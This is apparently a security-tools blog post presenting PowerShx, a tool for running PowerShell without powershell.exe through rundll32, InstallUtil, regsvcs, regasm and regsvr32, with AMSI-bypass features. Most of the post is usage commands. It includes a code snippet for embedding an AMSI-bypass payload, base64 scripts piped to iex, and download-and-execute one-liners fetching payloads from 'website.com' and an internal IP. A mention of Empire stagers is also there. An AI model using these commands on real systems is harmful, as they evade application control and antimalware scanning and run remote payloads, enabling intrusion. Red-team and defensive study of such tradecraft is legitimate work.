Kali Linux

PowerShx : Run Powershell Without Software Restrictions

PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.

Features

  • Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
  • Run Powershell without powershell.exe or powershell_ise.exe
  • AMSI Bypass features.
  • Run Powershell scripts directly from the command line or Powershell files
  • Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32

rundll32 PowerShx.dll,main -e
rundll32 PowerShx.dll,main -f Run the script passed as argument
rundll32 PowerShx.dll,main -f -c Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console

Alternatives (Credit to SubTee for these techniques):


  • x86 – C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
    x64 – C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll

  • x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll

  • x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll

  • regsvr32 /s /u PowerShx.dll –>Calls DllUnregisterServer
    regsvr32 /s PowerShx.dll –> Calls DllRegisterServer

.exe version

PowerShx.exe -i Start an interactive console
PowerShx.exe -e
PowerShx.exe -f Run the script passed as argument
PowerShx.exe -f -c Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Embedded Payloads

Payloads can be embedded by updating the data dictionary “Common.Payloads.PayloadDict” in the “Common” project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:

private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict[“amsi”]);
}

Examples

Run a base64 encoded script

rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex
PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64Str
ing(“BASE64”)) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode

Run a base64 encoded script

rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
PowerShx.exe -e “IEX ((new-object net.webclient).downloadstring(‘http://192.168.100/payload-http’))”

Requirements

.NET 4

R K

Recent Posts

Playwright-MCP : A Powerful Tool For Browser Automation

Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…

2 weeks ago

JBDev : A Tool For Jailbreak And TrollStore Development

JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…

2 weeks ago

Kereva LLM Code Scanner : A Revolutionary Tool For Python Applications Using LLMs

The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…

2 weeks ago

Nuclei-Templates-Labs : A Hands-On Security Testing Playground

Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…

2 weeks ago

SSH-Stealer : The Stealthy Threat Of Advanced Credential Theft

SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…

2 weeks ago

ollvm-unflattener : A Tool For Reversing Control Flow Flattening In OLLVM

Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…

2 weeks ago